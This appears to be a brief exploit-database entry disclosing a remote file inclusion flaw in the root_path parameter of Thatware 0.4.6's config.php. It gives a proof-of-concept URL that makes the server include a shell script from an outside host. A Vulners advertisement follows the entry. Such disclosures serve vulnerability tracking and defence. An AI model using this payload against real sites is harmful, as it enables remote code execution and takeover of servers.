Thatware version 0.4.6 has a remote file include vulnerability in the root_path parameter of the config.php page
===============================================================
Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability
===============================================================
Thatware 0.4.6 (root_path) Remote File Inclusion
CreW: ToXiC
Bug Found by Drago84
Page Affect
config.php
ExP:
http://www.sito.com/dir_thatware/config.php?root_path=http://www.evalsite.com/shell.php'
# 0day.today [2018-01-06] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo